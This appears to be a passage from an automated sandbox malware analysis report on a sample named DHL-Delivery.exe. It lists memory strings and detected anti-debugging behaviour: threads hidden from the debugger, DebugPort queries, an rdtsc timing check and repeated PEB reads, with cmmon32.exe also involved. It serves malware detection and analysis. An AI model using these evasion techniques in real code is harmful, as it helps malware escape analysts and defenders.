    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: VMware.View.Client10660
    Source: SearchUI.exe, 00000019.00000003.2842081231.000001E69FF82000.00000004.00000001.sdmpBinary or memory string: 9149*|hyper-v manager*|hyperv3631*|iheartradio*|i heart5460*|interactive ruby*|irb1319*|guild wars 2*|gw22732*|groove music*|groovw7428*|groove music*|grove5931*|h&r block 2015*|hr583*|groove music*|zune6376*|google earth*|google.6970*|ignite*|aeria1782*|groove music*|grooo7491*|groove music*|goove7177*|h&r block 2014*|hr417*|groove music*|songs5733*|hd tune*|hdtune1481*|groove m
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: VMware.Horizon.Client
    Source: SearchUI.exe, 00000019.00000003.2842156717.000001E69FAA7000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Microsoft\Exchange Server\V14\Bin\Exchange Management Console.msc11323{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe11333
    Source: C:\Users\user\Desktop\DHL-Delivery.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging:

    barindex
    Contains functionality to hide a thread from the debuggerShow sources
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A9AFD NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C0_2_021A9AFD
    Hides threads from debuggersShow sources
    Source: C:\Users\user\Desktop\DHL-Delivery.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A9AFD rdtsc 0_2_021A9AFD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A64C5 LdrInitializeThunk,0_2_021A64C5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A9AFD mov eax, dword ptr fs:[00000030h]0_2_021A9AFD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A321F mov eax, dword ptr fs:[00000030h]0_2_021A321F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A3229 mov eax, dword ptr fs:[00000030h]0_2_021A3229
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A9B1E mov eax, dword ptr fs:[00000030h]0_2_021A9B1E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A8334 mov eax, dword ptr fs:[00000030h]0_2_021A8334
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A8B4E mov eax, dword ptr fs:[00000030h]0_2_021A8B4E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A8B71 mov eax, dword ptr fs:[00000030h]0_2_021A8B71
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A9B65 mov eax, dword ptr fs:[00000030h]0_2_021A9B65
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A2921 mov eax, dword ptr fs:[00000030h]0_2_021A2921
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A3612 mov eax, dword ptr fs:[00000030h]0_2_021A3612
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A3614 mov eax, dword ptr fs:[00000030h]0_2_021A3614
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A3666 mov eax, dword ptr fs:[00000030h]0_2_021A3666
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A36AD mov eax, dword ptr fs:[00000030h]0_2_021A36AD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A36F0 mov eax, dword ptr fs:[00000030h]0_2_021A36F0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4CB8 mov eax, dword ptr fs:[00000030h]0_2_021A4CB8
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1E12 mov eax, dword ptr fs:[00000030h]6_2_1E1B1E12
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100E00 mov eax, dword ptr fs:[00000030h]6_2_1E100E00
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100E00 mov eax, dword ptr fs:[00000030h]6_2_1E100E00
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104E09 mov esi, dword ptr fs:[00000030h]6_2_1E104E09
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104E09 mov eax, dword ptr fs:[00000030h]6_2_1E104E09
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104E09 mov eax, dword ptr fs:[00000030h]6_2_1E104E09
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10DE31 mov eax, dword ptr fs:[00000030h]6_2_1E10DE31
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E105E34 mov eax, dword ptr fs:[00000030h]6_2_1E105E34
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E105E34 mov eax, dword ptr fs:[00000030h]6_2_1E105E34
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E105E34 mov eax, dword ptr fs:[00000030h]6_2_1E105E34
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDE2B mov eax, dword ptr fs:[00000030h]6_2_1E0DDE2B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDE2B mov eax, dword ptr fs:[00000030h]6_2_1E0DDE2B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E160E38 mov eax, dword ptr fs:[00000030h]6_2_1E160E38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E160E38 mov eax, dword ptr fs:[00000030h]6_2_1E160E38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E160E38 mov eax, dword ptr fs:[00000030h]6_2_1E160E38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EE20 mov eax, dword ptr fs:[00000030h]6_2_1E10EE20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EE20 mov eax, dword ptr fs:[00000030h]6_2_1E10EE20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E119E20 mov eax, dword ptr fs:[00000030h]6_2_1E119E20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11AE25 mov ecx, dword ptr fs:[00000030h]6_2_1E11AE25
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11AE25 mov eax, dword ptr fs:[00000030h]6_2_1E11AE25
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DAE30 mov eax, dword ptr fs:[00000030h]6_2_1E0DAE30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E197E53 mov eax, dword ptr fs:[00000030h]6_2_1E197E53
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FFE40 mov eax, dword ptr fs:[00000030h]6_2_1E0FFE40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E109E44 mov eax, dword ptr fs:[00000030h]6_2_1E109E44
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E109E44 mov ecx, dword ptr fs:[00000030h]6_2_1E109E44
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E195E7D mov ecx, dword ptr fs:[00000030h]6_2_1E195E7D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E195E7D mov eax, dword ptr fs:[00000030h]6_2_1E195E7D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A6E72 mov eax, dword ptr fs:[00000030h]6_2_1E1A6E72
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1E73 mov eax, dword ptr fs:[00000030h]6_2_1E1B1E73
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111E7C mov eax, dword ptr fs:[00000030h]6_2_1E111E7C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111E7C mov ecx, dword ptr fs:[00000030h]6_2_1E111E7C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E4E60 mov eax, dword ptr fs:[00000030h]6_2_1E0E4E60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E4E60 mov eax, dword ptr fs:[00000030h]6_2_1E0E4E60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E4E60 mov eax, dword ptr fs:[00000030h]6_2_1E0E4E60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E4E60 mov eax, dword ptr fs:[00000030h]6_2_1E0E4E60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E4E60 mov eax, dword ptr fs:[00000030h]6_2_1E0E4E60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E4E60 mov eax, dword ptr fs:[00000030h]6_2_1E0E4E60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E117E6E mov edi, dword ptr fs:[00000030h]6_2_1E117E6E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E113E90 mov eax, dword ptr fs:[00000030h]6_2_1E113E90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E113E90 mov eax, dword ptr fs:[00000030h]6_2_1E113E90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E112E90 mov eax, dword ptr fs:[00000030h]6_2_1E112E90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E112E90 mov eax, dword ptr fs:[00000030h]6_2_1E112E90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E183E9E mov ebx, dword ptr fs:[00000030h]6_2_1E183E9E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E183E9E mov eax, dword ptr fs:[00000030h]6_2_1E183E9E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E118E85 mov eax, dword ptr fs:[00000030h]6_2_1E118E85
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E118E85 mov eax, dword ptr fs:[00000030h]6_2_1E118E85
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E175E81 mov eax, dword ptr fs:[00000030h]6_2_1E175E81
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10DE87 mov eax, dword ptr fs:[00000030h]6_2_1E10DE87
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10DE87 mov eax, dword ptr fs:[00000030h]6_2_1E10DE87
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BEB3 mov eax, dword ptr fs:[00000030h]6_2_1E15BEB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BEB3 mov eax, dword ptr fs:[00000030h]6_2_1E15BEB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BEB3 mov eax, dword ptr fs:[00000030h]6_2_1E15BEB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BEB3 mov eax, dword ptr fs:[00000030h]6_2_1E15BEB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BEB3 mov eax, dword ptr fs:[00000030h]6_2_1E15BEB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BEB3 mov eax, dword ptr fs:[00000030h]6_2_1E15BEB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BEB3 mov eax, dword ptr fs:[00000030h]6_2_1E15BEB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BEB3 mov eax, dword ptr fs:[00000030h]6_2_1E15BEB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BEB3 mov eax, dword ptr fs:[00000030h]6_2_1E15BEB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E174EA5 mov eax, dword ptr fs:[00000030h]6_2_1E174EA5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A9EAF mov eax, dword ptr fs:[00000030h]6_2_1E1A9EAF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A9EAF mov eax, dword ptr fs:[00000030h]6_2_1E1A9EAF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A9EAF mov eax, dword ptr fs:[00000030h]6_2_1E1A9EAF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F4EC0 mov eax, dword ptr fs:[00000030h]6_2_1E0F4EC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F4EC0 mov eax, dword ptr fs:[00000030h]6_2_1E0F4EC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FEED0 mov eax, dword ptr fs:[00000030h]6_2_1E0FEED0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EEF0 mov eax, dword ptr fs:[00000030h]6_2_1E10EEF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EEF0 mov eax, dword ptr fs:[00000030h]6_2_1E10EEF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1EF8 mov eax, dword ptr fs:[00000030h]6_2_1E1B1EF8
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10DEF4 mov eax, dword ptr fs:[00000030h]6_2_1E10DEF4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10DEF4 mov eax, dword ptr fs:[00000030h]6_2_1E10DEF4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E1EE0 mov eax, dword ptr fs:[00000030h]6_2_1E0E1EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov ecx, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE0 mov eax, dword ptr fs:[00000030h]6_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E113EEC mov eax, dword ptr fs:[00000030h]6_2_1E113EEC
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D8F0A mov eax, dword ptr fs:[00000030h]6_2_1E0D8F0A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D8F0A mov eax, dword ptr fs:[00000030h]6_2_1E0D8F0A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D8F0A mov eax, dword ptr fs:[00000030h]6_2_1E0D8F0A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D8F0A mov eax, dword ptr fs:[00000030h]6_2_1E0D8F0A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100F19 mov eax, dword ptr fs:[00000030h]6_2_1E100F19
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E109F1C mov eax, dword ptr fs:[00000030h]6_2_1E109F1C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E1F3F mov eax, dword ptr fs:[00000030h]6_2_1E0E1F3F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E1F3F mov eax, dword ptr fs:[00000030h]6_2_1E0E1F3F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E161F50 mov eax, dword ptr fs:[00000030h]6_2_1E161F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E161F50 mov eax, dword ptr fs:[00000030h]6_2_1E161F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E161F50 mov eax, dword ptr fs:[00000030h]6_2_1E161F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E161F50 mov eax, dword ptr fs:[00000030h]6_2_1E161F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D6F45 mov eax, dword ptr fs:[00000030h]6_2_1E0D6F45
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D6F45 mov eax, dword ptr fs:[00000030h]6_2_1E0D6F45
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D6F45 mov eax, dword ptr fs:[00000030h]6_2_1E0D6F45
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B0F50 mov eax, dword ptr fs:[00000030h]6_2_1E1B0F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B0F50 mov eax, dword ptr fs:[00000030h]6_2_1E1B0F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B0F50 mov eax, dword ptr fs:[00000030h]6_2_1E1B0F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B0F50 mov eax, dword ptr fs:[00000030h]6_2_1E1B0F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B0F50 mov eax, dword ptr fs:[00000030h]6_2_1E1B0F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B0F50 mov eax, dword ptr fs:[00000030h]6_2_1E1B0F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B0F50 mov eax, dword ptr fs:[00000030h]6_2_1E1B0F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1F56 mov eax, dword ptr fs:[00000030h]6_2_1E1B1F56
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDF40 mov edx, dword ptr fs:[00000030h]6_2_1E0EDF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDF40 mov eax, dword ptr fs:[00000030h]6_2_1E0EDF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDF40 mov eax, dword ptr fs:[00000030h]6_2_1E0EDF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDF40 mov eax, dword ptr fs:[00000030h]6_2_1E0EDF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDF40 mov eax, dword ptr fs:[00000030h]6_2_1E0EDF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDF40 mov eax, dword ptr fs:[00000030h]6_2_1E0EDF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDF40 mov eax, dword ptr fs:[00000030h]6_2_1E0EDF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDF40 mov eax, dword ptr fs:[00000030h]6_2_1E0EDF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDF40 mov eax, dword ptr fs:[00000030h]6_2_1E0EDF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10BF40 mov eax, dword ptr fs:[00000030h]6_2_1E10BF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FAF50 mov eax, dword ptr fs:[00000030h]6_2_1E0FAF50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E118F70 mov eax, dword ptr fs:[00000030h]6_2_1E118F70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E169F70 mov eax, dword ptr fs:[00000030h]6_2_1E169F70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E172F70 mov eax, dword ptr fs:[00000030h]6_2_1E172F70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E172F70 mov eax, dword ptr fs:[00000030h]6_2_1E172F70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E172F70 mov eax, dword ptr fs:[00000030h]6_2_1E172F70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E172F70 mov ecx, dword ptr fs:[00000030h]6_2_1E172F70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111F7A mov eax, dword ptr fs:[00000030h]6_2_1E111F7A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111F7A mov eax, dword ptr fs:[00000030h]6_2_1E111F7A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EF7E mov eax, dword ptr fs:[00000030h]6_2_1E10EF7E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E107F61 mov ecx, dword ptr fs:[00000030h]6_2_1E107F61
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E185F60 mov eax, dword ptr fs:[00000030h]6_2_1E185F60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10DF6F mov eax, dword ptr fs:[00000030h]6_2_1E10DF6F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10DF6F mov eax, dword ptr fs:[00000030h]6_2_1E10DF6F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10DF6F mov eax, dword ptr fs:[00000030h]6_2_1E10DF6F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E168F93 mov eax, dword ptr fs:[00000030h]6_2_1E168F93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E168F93 mov eax, dword ptr fs:[00000030h]6_2_1E168F93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E168F93 mov ecx, dword ptr fs:[00000030h]6_2_1E168F93
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E119F98 mov eax, dword ptr fs:[00000030h]6_2_1E119F98
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E113F9B mov eax, dword ptr fs:[00000030h]6_2_1E113F9B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D9F80 mov eax, dword ptr fs:[00000030h]6_2_1E0D9F80
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16AF84 mov eax, dword ptr fs:[00000030h]6_2_1E16AF84
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E103F86 mov eax, dword ptr fs:[00000030h]6_2_1E103F86
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E108FB4 mov eax, dword ptr fs:[00000030h]6_2_1E108FB4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1FB4 mov eax, dword ptr fs:[00000030h]6_2_1E1B1FB4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E6FBB mov eax, dword ptr fs:[00000030h]6_2_1E0E6FBB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E6FBB mov eax, dword ptr fs:[00000030h]6_2_1E0E6FBB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A3FA5 mov ebx, dword ptr fs:[00000030h]6_2_1E1A3FA5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov eax, dword ptr fs:[00000030h]6_2_1E10EFD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov eax, dword ptr fs:[00000030h]6_2_1E10EFD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov eax, dword ptr fs:[00000030h]6_2_1E10EFD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov eax, dword ptr fs:[00000030h]6_2_1E10EFD0
